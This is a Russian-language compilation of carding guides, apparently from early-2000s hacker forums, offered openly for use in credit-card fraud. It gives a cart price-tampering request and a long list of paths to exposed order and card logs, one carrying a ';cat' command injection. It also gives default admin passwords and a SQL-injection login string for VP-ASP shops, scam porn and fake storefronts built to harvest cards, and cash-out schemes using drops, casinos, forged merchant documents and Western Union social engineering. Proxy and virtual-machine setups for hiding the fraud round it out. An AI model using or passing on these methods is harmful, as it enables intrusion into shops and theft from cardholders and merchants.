“14.95″, с помощью Achilles ты можешь теперь ее изменить и передать серверу.
А можешь просто передать запрос в строке браузера.
Так выглядит изначальный запрос:
—
http://www.maledicta.com/cgi-bin/quikstore…14.95%7CEquinox[+]
[+]+of+the+Gods%7CNA%7CNA=1&store_type=html&page=crowley.html&add_to_cart.x=45[+]
[+]&add_to_cart.y=14
—
А так модифицированный:
—
http://www.maledicta.com/cgi-bin/quikstore…0.95%7CEquinox+[+]
[+]of+the+Gods%7CNA%7CNA=1&store_type=html&page=crowley.html&add_to_cart.x=45&[+]
[+]add_to_cart.y=14
—
Приятных чтений на ночь;-).
Eat The Rich!
Copyright 2002-2004 by LwB Security Team. All rights reserved.
З,Ы, из первого шопа до сегодня можно креды дергать, привда без cvv2
Способ 1. Этот способ основан на уязвимости в OnLine магазинах… Наверно многим хочется поиметь чужие кредитки, владельцы которых пользуются ими в он-лайн шопах. Ну что ж…у вас есть такая возможность! Для этого вам не придётся ухищряться, делая свой порносервер и что-либо ломать. Достаточно просто зайти какой-нибудь известный поисковик (я бы посоветовал тебе http://www.altavista.com/ или http://www.yahoo.com/, но можешь пользоваться и другим) и ввести пару волшебных слов. Какие именно?! Хмм…давайте посмотрим ).
Многие админы оставляют открытыми такие директории:
/orders
/Order
/Orders
/order
/config
/Admin_files
/mall_log_files
/PDG_Cart
PDG_Cart/order.log
PDG_Cart/shopper.conf
/pw
/store/customers
/store/temp_customers
/WebShop
/webshop
/WebShop/templates
/WebShop/logs
/cgi/PDG_Cart/order.log
/PDG_Cart/authorizenets.txt
/cgi-bin/PDG_Cart/mc.txt
/PDG/order.txt
/cgi-bin/PDG_cart/card.txt
/PDG_Cart/shopper.conf
/php/mlog.phtml
/php/mylog.phtml
/webcart/carts
/cgi-bin/orders.txt
/WebShop/logs
/cgi-bin/AnyForm2
/cgi-bin/mc.txt
/ccbill/secure/ccbill.log
/cgi-bin/orders/mc.txt
/WebCart/orders.txt
/cgi-bin/orders/cc.txt
/cvv2.txt
/cgi-bin/orderlog.txt
/WebShop/logs
/orderb/shop.mdb
/_private/shopping_cart.mdb
/scripts/iisadmin/tools/mkilog.exe
/cool-logs/mylog.html
/cool-logs/mlog.html
/easylog/easylog.html
/HyperStat/stat_what.log
/mall_log_files/
/scripts/weblog
/super_stats/access_logs
/trafficlog
/wwwlog
/Admin_files/order.log
/bin/orders/orders.txt
/cgi/orders/orders.txt
/cgi-bin/orders/orders.txt
/cgi-sys/orders/orders.txt
/cgi-local/orders/orders.txt
/htbin/orders/orders.txt
/cgibin/orders/orders.txt
/cgis/orders/orders.txt
/scripts/orders/orders.txt
/cgi-win/orders/orders.txt
/bin/pagelog.cgi
/cgi/pagelog.cgi
/cgi-bin/pagelog.cgi
/cgi-sys/pagelog.cgi
/cgi-local/pagelog.cgi
/cgibin/pagelog.cgi
/cgis/pagelog.cgi
/scripts/pagelog.cgi
/cgi-win/pagelog.cgi
/bin/DCShop/auth_data/auth_user_file.txt
/cgi/DCShop/auth_data/auth_user_file.txt
/cgi-bin/DCShop/auth_data/auth_user_file.txt
/cgi-sys/DCShop/auth_data/auth_user_file.txt
/cgi-local/DCShop/auth_data/auth_user_file.txt
/htbin/DCShop/auth_data/auth_user_file.txt
/cgibin/DCShop/auth_data/auth_user_file.txt
/cgis/DCShop/auth_data/auth_user_file.txt
/scripts/DCShop/auth_data/auth_user_file.txt
/cgi-win/DCShop/auth_data/auth_user_file.txt
/bin/DCShop/orders/orders.txt
/cgi/DCShop/orders/orders.txt
/cgi-bin/DCShop/orders/orders.txt
/cgi-sys/DCShop/orders/orders.txt
/cgi-local/DCShop/orders/orders.txt
/htbin/DCShop/orders/orders.txt
/cgibin/DCShop/orders/orders.txt
/cgis/DCShop/orders/orders.txt
/scripts/DCShop/orders/orders.txt
/cgi-win/DCShop/orders/orders.txt
/dc/auth_data/auth_user_file.txt
/dcshop/orders/orders.txt
/dcshop/auth_data/auth_user_file.txt
/dc/orders/orders.txt
/orders/checks.txt
/orders/mountain.cfg
/cgi-bin/shopper.cgi&TEMPLATE=ORDER.LOG
/webcart/carts
/webcart-lite/orders/import.txt
/webcart/config
/webcart/config/clients.txt
/webcart/orders
/webcart/orders/import.txt
/WebShop/logs/cc.txt
/WebShop/templates/cc.txt
/bin/shop/auth_data/auth_user_file.txt
/cgi/shop/auth_data/auth_user_file.txt
/cgi-bin/shop/auth_data/auth_user_file.txt
/cgi-sys/shop/auth_data/auth_user_file.txt
/cgi-local/shop/auth_data/auth_user_file.txt
/htbin/shop/auth_data/auth_user_file.txt
/cgibin/shop/auth_data/auth_user_file.txt
/cgis/shop/auth_data/auth_user_file.txt
/scripts/shop/auth_data/auth_user_file.txt
/cgi-win/shop/auth_data/auth_user_file.txt
/bin/shop/orders/orders.txt
/cgi/shop/orders/orders.txt
/cgi-bin/shop/orders/orders.txt
/cgi-sys/shop/orders/orders.txt
/cgi-local/shop/orders/orders.txt
/htbin/shop/orders/orders.txt
/cgibin/shop/orders/orders.txt
/cgis/shop/orders/orders.txt
/scripts/shop/orders/orders.txt
/cgi-win/shop/orders/orders.txt
/bin/shop.pl/page=;cat%20shop.pl
/cgi/shop.pl/page=;cat%20shop.pl
/cgi-bin/shop.pl/page=;cat%20shop.pl
/cgi-sys/shop.pl/page=;cat%20shop.pl
/cgi-local/shop.pl/page=;cat%20shop.pl
/htbin/shop.pl/page=;cat%20shop.pl
/cgibin/shop.pl/page=;cat%20shop.pl
/cgis/shop.pl/page=;cat%20shop.pl
/scripts/shop.pl/page=;cat%20shop.pl
/cgi-win/shop.pl/page=;cat%20shop.pl
/bin/cart.pl
/cgi/cart.pl
/cgi-bin/cart.pl
/cgi-sys/cart.pl
/cgi-local/cart.pl
/htbin/cart.pl
/cgibin/cart.pl
/scripts/cart.pl
/cgi-win/cart.pl
/cgis/cart.pl
/bin/cart.pl
/cgi/cart.pl
/cgi-bin/cart.pl
/cgi-sys/cart.pl
/cgi-local/cart.pl
/htbin/cart.pl
/cgibin/cart.pl
/cgis/cart.pl
/scripts/cart.pl
/cgi-win/cart.pl
/bin/cart32.exe
/cgi/cart32.exe
/cgi-bin/cart32.exe
/cgi-sys/cart32.exe
/cgi-local/cart32.exe
/htbin/cart32.exe
/cgibin/cart32.exe
/cgis/cart32.exe
/scripts/cart32.exe
/cgi-win/cart32.exe
/cgi-bin/www-sql;;;
/server%20logfile;;;
/cgi-bin/pdg_cart/order.log
/cgi-bin/shopper.exe?search
/orders/order.log
/orders/import.txt
/orders/checks.txt
/orders/orders.txt
/Orders/order.log
/order/order.log
/WebShop/logs/ck.log
/WebShop/logs/cc.txt
/WebShop/templates/cc.txt
/_private/orders.txt
В директориях подобного рода содержатся файлы типа:
orders.txt
order.txt
import.txt
checks.txt
order_log
order.log
orders.log
orders_log
log_order
log_orders
temp_order
temp_orders
order_temp
orders_temp
quikstore.cfg
quikstore.cgi
order_log_v12.dat
also order_log.dat
web_store.cgi
storemgr.pw
admin.pw
cc.txt
ck.log
shopper.conf
Так же нужно смотреть *.cfg, *.pw и *.olf файлы
Хех…вроде бы и всё, что нужно знать. Ложишь пальцы на клаву и нервно стучишь в поисковую строку нечто на подобие “Index of /orders.log” и жмёшь ENTER. Что дальше?! А дальше вам стоит просто терпение и перебор нужных ссылок…а потом проверка полученых кредиток. Вот так вот плохие люди имеют ваши креды.Способ 2. Делаем порносайт ! Да-да именно порносайт. Идея в чем ? Много раз ты видел в сети кучу сайтов, которые предоставляют тебе доступ в каталог с порнушкой после того как ты заплатишь N-ую сумму по кредитке. Тебе влом делать такую пагу? Но ради сотен кредиток тебе стоит этим заняться, тем более что пага будет левая, те не надо заливать туды тысячи картинок. Делаем крутую начальную страницу, желательно на флеше и без фреймов(так юзеры любят), и страницу для бесплатного доступа(free trial), залив туда штук десяток крутейших качественных фоток, которые не нужно брать с таких известных и крупных сайтов как http://www.sex.com/, http://www.porno.com/. потом заделываем регистрацию для получения от ламеров/юзеров номеров их кредиток и инфы, которая необходима для того чтобы эти бабки с креды слить. Всосал фишку? И делов то на 2 часа ! При этом слезно обещаешь юзверю, что пароль для доступа ты пришлешь через 2 часа, и вот тебе еще и мыло, которое ты можешь продать в большом количестве. Двойная выгода. Ясен перец, что пароль ты не пришлешь, но зато пришлешь уведомление о том, что сайт временно не работает! И запомни фишку, не загибай цен, а креды проверяй для того чтобы знать, что юзер довольно половозрелое существо (то бишь совершеннолетний), так многие делают! Надеюсь ты все уяснил? И запомни: НЕ ЖАДНИЧАЙ !
Способ 3. С помощью 2 способа ты получишь минимум кред. Порносайт плох тем, что вряд ли вам удастся создать что-то такое, на что народ бы валом попёр, т.к. то, что можно было придумать новаторское в этой области, давно придумано, да и народу, который на порносайты за деньги валит, сравнительно немного…и ламерков (юзеров, программеров, хакеров, системных администраторов – подчеркнуть нужное), которые пытаются денег нагрести, полно, а после публикации в “Хакере” количество оных, я думаю, увеличится ещё раз в 5-10 раз.
Чтобы выделиться на общем фоне, надо прибегать к-чёрт-знает-каким-напрягам, да и вообще подумай: надо ли тебе это?
Есть идея получше: открыть свой е-магазин , без всяких шуток.
Итак, фишка заключается в том, что можно предложить народу любые продукты (только не варенье и не тампаксы ), по ценам ниже рыночных . Как это сделать? Да очень просто: мы только предлагаем, но ничего не продаём. Давайте приведу пример: создаём сайт по продаже супер-пупер-мега-дрюпер-компов по цене в 400 вечнозеленых ну (ест-но, покупка по кредам), после некой рекламы про супер-низкие цены к нам приходит человек, и, видя данную картину, естественно желает прикупить парочку данных компов. Далее, он покупает их по креде, которая и приходит к нам на е-маил, а через дня два ему посылается письмецо с содержанием: Компания супермега компы Inc. крупно извиняется, но не может выполнить данную услугу в данный момент, или что-то в этом духе… И вот у вас креда в руках, творите что хотите, но особенно не зарывайтесь.
Так же можно продавать буржуям продукты питания, так как там, где солнце светит наглой мордой, покупки через интернет делают в основном домохозяйки.
Способ 4.
MetaCart2.sql – система покупок, основанная на ASP + MS SQL. Обнаруженная уязвимость в программе позволяет атакующему получить доступ к базе данных, в которой хранятся чувствительные данные (номера кредитных карточек, адреса, E-mail и т.п). Пример: http://xxxshop/database/metacart.mdb, http://xxxshop/database/metacart.mdb, http://xxxshop/metacart/database/metacart.mdb, http://xxxshop/metacart/database/metacart.mdb. Уязвимость обнаружена в MetaLinks MetaCart2.sql Если хотя бы немного разбираешься в хакинге, ты припоминаешь такую фишку Cart32. Эта фигня стояла на многих онлайн – магазинах. Cart32 очень дырявый, можно было просматривать базы данных с кредитными карточками. Увы, админы все дырки позакрывали. Я тут недавно пытался через Cart32 надыбать кред, я запарился искать дырявый сервак, но так и не нашел.
Сейчас существует почти аналог Cart32, так назваемый VP-ASP. Он, как ни странно тоже дырявый. Все ниженаписанные действия проводи через анонимный прокси. Так что лезь на Альтависту и пиши shopadmin.asp. Выбирай любой сайт, который тебе предложит ввести пароль и логин. По дефолту пароль с логином: admin/admin, vpasp/vpasp или ‘or”=’. Если тебя пропустили, ты можешь смотреть/удалять/изменять разную инфу: списки товаров, категории товаров и………инфу о кредах. Вот они долгожданные. Но бывает, что админ не полный ламак и изменяет пароль. Тогда ты увидишь розовую птицу обломинго.
Но не все потеряно. Опять же по дефолту база данных о юзерах в незашифровонном виде находится в файле shopping300.mdb/shopping400.mdb, но
опять но…. Админ мог изменить имя файла. К нам на помощь приходит файл
shopdbtest.asp, который доступен всем, и он раскрывает месторасположение
базы данных внутри значения xDatabase. Копируешь имя файла и добавляешь
расширение .mdb, так как имя файла прописано без расширения. Только ты
поторопись, похоже админы очнулись, начинают дырку закрывать, гады.
Если у тебя все получилось, считай себя начинающим кардером. Ты имеешь базу дынных кредиток, только ты ими особо не злоупотребляй, лучше продай их кому-нибудь. Но если у тебя ничего не вышло, а тебе нужны креды, как туалетная бумага, пиши мне, я тебе всегда продам немного кред за определенную плату. Уж у меня-то свеженькие номера кредиток имеются. Я в инете видел пару сайтов, где размещают ворованные креды, поищи их.
Способ 5. В больших супермаркетах принимают к оплате кредитные карты. После того, как покупатель прошел через кассу у него на руках остается чек и “Слип”. Так вот многие люди просто выкидывают его в урну. Стоит поошиваться около мусорки и у тебя на руках остается почти настоящая кредитка. Кстати подходят только карточки Visa, MasterCard и AmericanExpress(aka Amex). (это обычно пишется на слипе.)
Способ 6. Попросить у друга-официанта незаметно переписать номер кредитки и дать/продать тебе.
Способ 7. Взломать какой-нибудь web-shop и скоприовать файл или лог с кредиками. Способ имеет большой недостаток. Необходимо быть крутым хакером, а этим наделены немногие.
Вот мой перец, я представляю на твое жесткое рассмотрение свою статью с таким интересным названием. Вот ты начинающий кардер. Ты где-то купил кред, или ломанул какой-нибудь шоп. И перед тобой встает вопрос: “что мне делать с этими картами?”. Я попробую на него тебе(вопрос), дать исчерпывающий ответ. Тебе уже надоело регить хостинги, да и руки болят от порнухи. И ты решил поиметь немного лавэ и немного америкосов. Первое что я хочу тебе сказать, то что карты желательно иметь с cvv2. Но также есть способы обнала обычных карт. Весь процесс обнала сводится к поиску счета, или к поиску дропа с тем же счетом. Самое простое для начала найти дропа. Хорошо если у тебя есть кореш в USA, которому нужны деньги. Ты с ним договариваешься. Он тебе открывает счет и процесс пошел. Ниже я перечислю способы обнала простых кред.
Первый и на мой взгляд самый интересный способ. Ты играешь в онлайн-казино. Там принимают обычные карты без цвв2. Там с карты можно снять до 1000-5000. Берешь карту с большим балансом и снимаешь. Главная фишка в казино это обнал. Чтобы обналить, 50% казино высылают на твой адрес спец код, который тебе придется ввести. Но ты можешь при регистрации ввести адрес дропа или письмо с мольбой о помощи. Ну со вторым типом казино думаю проблем не будет. Ты делаешь Wire Transfer в банк кореша, тот забирает деньги, отсылает тебе WesternUnion’ом. И все довольны. В казино, если играешь на большие суммы(а особенно не на свои), выиграть можно даже легко. Лучше играть на рулетке. И ставить на Красное/Черное, Чет/нечет. Мой друг выиграл 3000$ при начальной ставке в 350$. Но если даже проиграешь ничего страшного не будет. Вот вроде и все про казино.
Второй способ. Он более сложен в осуществлении. Прежде всего нужен мерчант. Хороший мерчант достать очень трудно, т.к этот способ стар как мир. Делаешь сайт по продаже чего-нибудь виртуального. Т.е чего-угодно. Пример: проги, перл скрипты, flash заставки и т.д, и т.п. Самое главное в сайте это профессиональный дизайн. И чтобы сайт был полностью рабочим. Некоторые мерчанты расплачиваются чеками, wire transfer, а некоторые даже WU. Так что выбирай какой нравится. Merchant лучше оформлять в реале. Т.е подделывать документы как бы от фирмы и высылать их по факсу в эту компанию, которая предоставляет мерчант. Советую надыбать инфу по америкосам и заполнять анкеты в мерч с этой инфой. Если тебе повезло и ты получил мерч. Интегрируй шоп с мерчем и начинай его ПОТИХОНЬКУ накручивать. Ты так же должен рекламить шоп, чтобы было много посещений. Меняй прокси и кукисы все время. Т.к сейчас мерчи сильно “поумнели”.
Но вот мой дорогой читатель. Вот и все, что я хотел изложить про простые креды. Ну а теперь настал черед CVV2.
1. Paypal
Раньше была довольно прибыльной конторой для кардеров. Надеюсь, вы читали мою предыдущую статью. Сейчас там ввели массу проверок, т.к фрауд с помощью пайпала увеличивается. Но не стоит отчаиваться, в сети появилось масса контор, которые предоставляют похожие услуги. И они гораздо любезнее относятся к кардерам.
2. WesternUnion
Кардить сложно и стремно. Но еще пока возможно. Для начала надо найти бомжа, т.е WU дропа , который будет со своим паспортом забирать твои деньги. Достаешь 200% рабочую цвв2 карту, желательно Германия или Франция. Потом звонишь по этим двум телам в Америку 1-800-325-6000. Говоришь типа моя бабушка в России больна и ей нужны деньги. Они тебя спросят массу вещей. Потом попросят продиктовать номер карты и цвв2 код. Только тут есть одна хитрость, надо косить под немца или француза. Если транзкация проходит, то дроп приходит и забирает деньги. Ну я надеюсь мой дорогой читатель, что у Вас хватит ума, чтобы не звонить со своей квартиры
Ну вот мой дорогой друг тебе вдруг надоело делится с дропом и ты подумываешь о покупке онлайн счета. Онлайн счет можно заказать во многих конторах. Т.е тебе нужна только ПОЛНАЯ инфа о владельце. Ее можно купить, а можно и где-нибудь достать. Ты идешь в контору типа www.netbank.com, таких контор много так что ищи. И регишься там с инфой америкоса. Если контора “нормальная”, то тебе сразу открывают счет с онлайн доступом. Если нет, то тебе вышлют кучу бумаг. Но можно получить эту кучу на адрес дропа и попросить его, тебе их заполнить. Открытие счета очень сложное и муторное занятие. Но если все получится, то ты будешь просто иметь много лавэ. Ну все, мой дорогой читатель. Я отдаю свою скромную статью на твое растерзание. Удачи тебе в твоих нелегких кардерских делах. И как выразился один мой хороший приятель: “Мы сделаем Америку победнее, а СНГ чуть побогаче”…
конецформыначалоформыС каждым днём кардить становиться всё тяжелее и тяжелее … но люди, работающии в данном направлении, нисколько не останавливаются, а придумывают всё более исхищрённые методы – по сути дела всё осталось на своих местах. И так всё-таки почему же тяжелее? Дело в том что проверки билингов стали более тщательны к свои клиентам – если ранее ты используя просто анонимную прокси мог действовать легко и непринуждённо, то сейчас не все билинги любят просто анонимные прокси … им нравиться когда прокси не анонимный и из того штата откуда карта, это несколько усложняет работу но не приостанавливает. Итак, подготовимся кардить.
Начнём с анонимности, которая была бы по душе как билингу, так и нам .
Берём небезизвестную софтину SocksCap32
(это программа для запуска различного софта под соксом), скармливаем ей соксик, потом запускаем через неё
броузер, а cамому броузеру скармливаем простую неанонимную прокси нужного нам шатата – чтоб если билинг
и имеет фичу проверки ip с сопоставлением региона, то он бы был счастлив безмерно.
Проверяться можно простым путём, на www.all-nettools.com/pr.htm – там мы глянем анонимны мы или нет. Там кстати есть и ещё много полезных тулзов. Если кому-то сомнительно, что билинг различает анонимные прокси то это можно легко проверить.
Берём анонимную проксю и пишем в броузере ya.ru – так вот он большинство анонимных проксей не пускает, видно
не настолько они анонимные как бы хотелось. Также заголовки смотрят, системный язык и это всё также подменяется разным софтом. Насчёт каким? Так его массы; наконец, можно прочесть или спросить на carderplanet.
Итак картон ты купил на планете, или сам нарыл, или кто-то дал … в общем, ты готов к работе, как вдруг твой боевой дух и клич заднего места быстренько тебя расслабляет )))) – а что делать то собственно?
(это я не у вас спрашиваю …). А делать то вот что – то же, что и всегда – искать, бороться, найти и закардить.
А что искать-то? А искать мы будем тех, кто платит – а кто платит мы проверим методом тыка…или узнав на carderplanet. Мы же не будем переходить на название и конкретику – это было бы некрасиво. Каждый пусть ищет и найдёт/сопрёт/купит/поменяет своё место сам. Скорее всего это уже не будет казино, а будет, к примеру,
тотализатор (надеюсь, не надо объяснять что это такое). Искать сие сокровище желательно на поисковиках неизвестных где-нить глубоко и далеко, так как все самые громкие конторы платят только поначалу а потом наша братия быстро заставляет их задуматься о своём доходе. Если кто то считает, что тут не о кардинге, то зря, так как кардинг вбирает в себя множество других “наук”. Как быть если злостный биллинг всё равно не хочет принимать карты? Не надо торопиться,
бежать и орать продовцу, что он их сам сгенерил или просто сочинил или что они чёрт знает откуда. Надо просто написать письмо конторе, что мол так и так, у меня такие то проблемы – что вы мне можете посоветовать, к каким банкам вы относитесь более доброжелательно. Как правило, тебе напишут несколько имён банков, карты
которых проходят лучше, чем другие.
Что делать с именами? Как узнать, тех ли банков у тебя карты? Всё гениальное просто – бежим на carderplanet и спрашиваем, есть ли у кого база банков по бинам (префиксам) – дело в том, что
первые 6 цифр на карте несут информацию, какому банку принадлежит карта. Думаю дальше всё понятно(если непонятно
то из тебя будет “кардер что надо” и ты заработаешь миллион быстрее остальных..). И так если реги опять не проходят, а пальцы не потеют … поздравляю ты наверно гей так как юзаешь рексону .
Итак, предположим, что ты нашёл/спёр/купил/поменял конторку, которая платит, ты зарегался и выиграл. Уже кричишь “ура”, как тут тебя опять раслабляет всё тот же боевой клич всё из того же места . Так вот – зелёные бумашки с изображением моей бабушки обычно выплачивают либо на PayPal, либо высылают по ACH, либо остальное как нас не интересует как правило … а как обналичить, как получить, и чтоб всё анонимно – это тебе прямиком к нам на
carderplanet – там ты найдёшь себе всё, что нужно и нужных людей.
конецформыначалоформыВ кардинге есть много специализаций. Дропы, Нальщики, Вбивальщики все они “подданые” кардерской сцены. Сегодня я подробно постараюсь описать профессию вбивальщика. Вбивальщик, как говорилось ранее (см другие мои статьи на эту тему) заказывает товар в он лайн магазинах. Причем заказывает правильно. То есть заходит под Амерскими виндами и с амерским ай пи.
Чтобы стать вбивальщиком, много ума не надо. Достаточно установить Виртуал Пк. Установка проста, как полкило картошки. Написано подробно, что и куда нажимать.
Эта прога – аналог WMWare. Но она хороша тем, что работает на всех версиях Виндовсов, а WMWare – только на Win2000/NT/XP. На данный момент, последняя версия – 5.1 Качать отсюда ftp://12.246.182.23/uploads/VirtualPC5_1OInstaller.exe
Крак ftp://12.246.182.23/uploads/VirtualPCkeygen5.1.exe Если линки не пашут – www.connectix.com Но мной юзалась версия 4.3 Вот некоторые комментарии юзеров о Virtual PC:
Что такое Virtual PC?
Это виртуальный компьютер, который умеет работать на одном компьютере. Можно с несколькими виртуальными компьютерами в одном реальном компьютере. В этом виртуальном можно установить вручную Линукс, Мас, Винду, МС-ДОС, …. Когда установишь Virtual PC – там будет занимать места, зависит от свободной екмкости винчестра. И будет открыт новый виртуальный компьютер с чистым неформатированным винчестром. Это как новый компьютер купили.
И в ней есть такая замечательная вещь как транзакции… т.е. мы создаём специальный виртуальный диск при работе с которым данные на него не сохраняются пока вы не закончите с ним работу…
- ставите нужный софт … настраиваете…
- он сохраняет конфигурацию(заканчивает транзакцию) при выключении виртуального компа…
- включаем его, делаем своё чёрное дело и просто при выключении виртуальной машины отказываемся от сохранения транзакции… вот и всё тачка по прежнему девственно чиста ….и конфигурация сохранена…
1)Устанавливаем Virtual PC, прикладываем пилюльки. В Readme подробно описано для каждой системы – сколько её нужно оперативки и места на винте. Мной устанавливалась английская Винда 98, требует она 64 mb RAM и 500 метров на диске, но мной было отведено 600 метров.
2)Запускаем прогу. Вылезает маленькая менюшка. Щёлкаем New PC. Предлагается как-нить “обозвать” виртуальный комп. Допустим – “Винда”. Далее ставим галочку в пункте Guide me. Потом предлагается выбрать тип системы – выбираем Windows 98. Предлагается по умолчанию 64 mb оперативки – нам этого как раз хватает. Ставим галочку в пункте No. Если этого мало или наоборот много – то галочку в пункте Yes и выбираем,сколько оперативки нужно для виртуального компа. Далее выбираем пункт Сreate a new hard disk image. Далее предлагается указать место, где будет храниться виртуальный комп – любое место. Жмём Finish.
3)Hастраиваем сохранённый виртуальный комп. В меню Virtual PC жмём File – Virtual Disk Wizard. Далее выбираем пункт Create new floppy or hard disk image. Дальше выбираем Сreate hard disk image. Потом указываем путь, где валяется наш виртуальный комп. Потом спросят – The file “Винда” already exsists Do you wish to overwrite it? Жмём Ок. Выбираем пункт Dinamically expanding disk image. Выбираем формат FAT32, указываем размер – я выбрал 600 метров, жмём Finish – и всё – теперь размер винта вашего виртуального компа составляет 600 метров. Также, можно указывать любой размер винта,какой вам нужен.
4)В менюшке Virtual PC будет видна строка Винда Not running. Жмём на вторую кнопку сверху – Settings. РС Name – Винда(можно изменить на любое)
Memory – 64 метра(можно изменять – больше или меньше)
Hard Disk 1 – указано расположение виртуального компа.
Hard Disk 2 – None
Hard Disk 3 – None
Undo Folder – ничего не ставим.
CD/DVD-ROM – ставим обе галки
Floppy – тоже ставим обе галки.
СОМ1 – выбираем Host Serial Port – я выбрал СОМ1 и поставил галочку – Wait for modem command to open port(это для момеда).
СОМ2 – none( кому нужен – врубите)
Networking – выбираем Shared Networking(NAT)
Remote Control – Disabled. Это управление виртуальным компом – кому нужно, выбираем Enabled.
Жмём Ок.
5)Далее нужно зайти в File – Preferences.
Все настройки были оставлены по умолчанию. Единственное,что здесь было изменено – это в пункте Keyboard клавиша переключения курсора мыши между основным и виртуальным компом. В пункте Security предлагается поставить пароли, но он был оставлен Disabled.
Жмём Ок.
6)Теперь в менюшке Virtual PC выбираем Винда Not Running, жмём Start Up. Появляется окно, в нём надпись – “OS not found Install an OS on this hard drive”
Суём в дисковод загрузочную дискетку Windows98, в СD-ROM – диск с Виндой 98 и ставим.
7)Инсталлим в виртуальном компе SoksCap, SocksChain, Proximitron, A4Proxy, английскую Оперу(или другой браузер, криптовалку(PGP, DriveCrypt, BestCrypt etc), Evidence Eliminator… (какой я ещё софт забыл?) – и вперёд.
Потом с виртуального компа я вылез в Инет. Сходив на сайты, выдающие всю инфу о компе – Ось, язык системы и т.п. показали, что язык системы и браузера – english…
Когда вы заканчивате работу с виртуальным компом, при закрытии окна предлагается 2 варианта:
1. Save PC state – все запущенные программы, приложения и т.п. будут сохранены, да и сама Винда тоже.
2. Turn off PC – виртуальный комп полностью вырубается. При включении заново загружается Винда и т.п.
Такая вот полезная штука этот виртуал пк.
А сейчас я расскажу о настройке A4Proxy.
Если вы в локальной сети: клуб, университет то прокси уже настроен и изменить не получится. Если надо бысто переключать прокси серверы, проверить их на анонимность, скорость и т.д. воспользуйтесь программой A4Proxy. Ниже написано как настроить свой броузер на работу с этой прогой.
Настройка Internet: Explorer: надо зайти Сервиссовойства обозревателяподключениенастройка сети нужно поставить галочку использовать прокси сервер, ввести адрес и порт на котором работает прокси.
Настройка Netscape Navigator: правка/настройки/дополнительные настройки/прокси сервер выбрать “Подключение через прокси сервер”, нажать “настройка” и вписать прокси (для HTTP): 127.0.0.1 и порт например: 3128.
Настройка Opera: Файл/Настройки/Подключения/Пркси-серверы/ выбрать HTTP и вписать 127.0.0.1 и порт например: 3128.
Tray menu
Favorites – Сдесь находятся, прокси-серверы помеченные как “Дабавлен в список” и одним щелчком мыши можно выбрать активный
New on each req – Если выбрать эту функцию то a4proxy будет использовать разные пркси-серверы для каждой web-страницы, это можно сделать и на вкладке “proxy options”
Modify Requests – Сдесь можно активировать “Modification List” (список изменений) заголовков запросом
Block All Cookies – Выберите, что-бы блокировать все исходящие и всодящие “Куки”.
Direct Connection – Если вы хотите что бы браузер на прямую обратился к web-странице то используйте Direct Connection
Закладка Proxy Activity
Proxy Activity Показывает текущий статус и статистику подключений a4proxy, если все поля пустые это значит что ваш браузер не может соедениться с a4proxy.
Proxy Clients – IP адреса в сети, которые используют A4Proxy как прокси-сервер. Этот список можно использовать, что бы добавлять некоторые IP-адреса в stop-лист.
Requested Hosts – Имена запрошеных хостов,
Names of requested hosts- Этот список можно использовать что бы ассоциировать запросы к удаленному хосту с определенных прокси-серверов, так же, что бы добавить хост в “HOST Stop List”.
Sockets used – Этот индикатор показывает наибольшее количество каналов данных, используемых одновременно.
Sockets Activity – Показывает статистику текущих операций.
Закладка: Proxy Check
Используется для проверки анонимности и скорости прокси-сервера, список прокси-серверов содержит много полезной информации, проктутите его что бы увидеть все колонки.
Кнопка “Check Proxy”- Проверка proxy-сервера, если проверка затянулась то можно нажать “Stop&Save”
Reset Data если эта функция активирована, то все данные о прокси-сервере будут сбрасываться при каждой проверке, если не активна(по умолчанию), то данные будут собиратья по принципу “Плохой результат важнее хорошего”
Repeats количество повторяющихся проверок
Active Requests – количество активных запросов, если в течении длительного времени количество не уменьшается, то рекомендуется нажать кнопку “Stop&Save”
Если слева появилась иконка в форме зеленого круга перечеркнутого красным крестиком, это значит что прокси анонимный (скрывает IP) но не соответствует критериям выбранным в закладке “Proxy options”.
Закладка Proxy Options
Здесь при помощи настроек можно установить фильтры для прокси-сервров, и контролировать их поведение, так же можно изменить порт соединения программы A4Proxy с вашим браузером. прокси-серверы, которые не удовлетворяют требованиям списка, помечаются красным крестиком Первая группа настроек позволяет вам препятствовать использованию прокси серверы, которые посылают следующие заголовки запросов web-сайтам:
HTTP_VIA- Это основной фильтр. Параметр HTTP_VIA “говорит” веб-серверу что вы используете прокси сервер. Когда вы вибираете этот фильтр, вы “вычеркиваете” все такие прокси-серверы Присутствие этой переменной в запросе к веб-сайту обнаруживает факт, использования вами proxy-сервера, так же передается информация о proxy- сервере, но не о вашей машине.
HTTP_FORWARDED – Аналогичен to HTTP_VIA. Показывает адрес и порт прокси сервера, а так же адрес и порт через который был подан запрос.
HTTP_USER_AGENT_VIA – Снова, аналогичный предыдущему. В некоторый случаях показывает через какой прокси был подан запрос.
HTTP_CACHE_CONTROL and HTTP_CACHE_INFO – Присутствие любого из этих параметров передает веб-сайту что вы используете прокси, эти параметры содержат информацию о кэше прокси -сервера.
HTTP_[PROXY]_CONNECTION- Выключайте в большинстве случаев. Тип соединения “close” показывает, что используется прокси-сервер (Броузет использует соединение типа “Keep-Alive”)
Use new proxy on each request – Включите, для того что-бы использовать разные прокси при каждом запросе. Таким образом для сервера это будет выглядеть, будто много разных людей получают доступ в одно и то же время. Но это может замедлить соединение.
Use n proxies from position… – Вы можете сортировать прокси по разным параметрам, щелкая мышкой в верху колонки
Connection:
Keep-Alive only – Это два основных вида подключения “Close” и “Keep-Alive”. Первый типичен для прокси серверов, второй использыется броузерами для прямого подключения. Некоторые прокси серверы поддерживают “Keep-Alive”, это смотрится как прямое соединение броузера. Эта опция ограничиват прокси теми, которые поддерживают такой тип. Наличие информации Proxy_(Connection), в запросе показывает, что он сделан через прокси сервер, если вы хотите убрать эту информацию, выберите эту функцию. Но некоторые веб-сайты, не устанавливают соединения без это1 информации. Кроме того некоторые прокси сами изменяют данные в соответствии со своими настройками
Simulate HTTP_X_FORWARDED_FOR_IP (HTTP_CLIENT_IP) – Этот параметр заменяет реальный IP-адрес случайным,
Anonymity Check Options:
Check for anonymity on each request – Если выбран этот пункт, то A4Proxy проверяет на анонимность текущий прокси сервер, перед отправлением запроса.
Check for FTP/HTTPS support on Reset Data – Выберите эту функцию если вы хотите вести полную проверку функций прокси серверов, когда вы проверяете их со сбросом данных(вкладка Proxy Options)
Additional Options:
Default Proxy – Прокси сервер используемый по умолчанию(если не используется функция Use new proxy on each request, т.е. использование нового прокси при каждом запросе)
Proxies in use – Этот индикатор показывает те прокси, которые соответствуют требованиям пользователя.
Anonymity rank – Этот индикатор показывает относительный уровень анонимности соединения, в соответствии с выбранными фильтрами и дрю наастройками
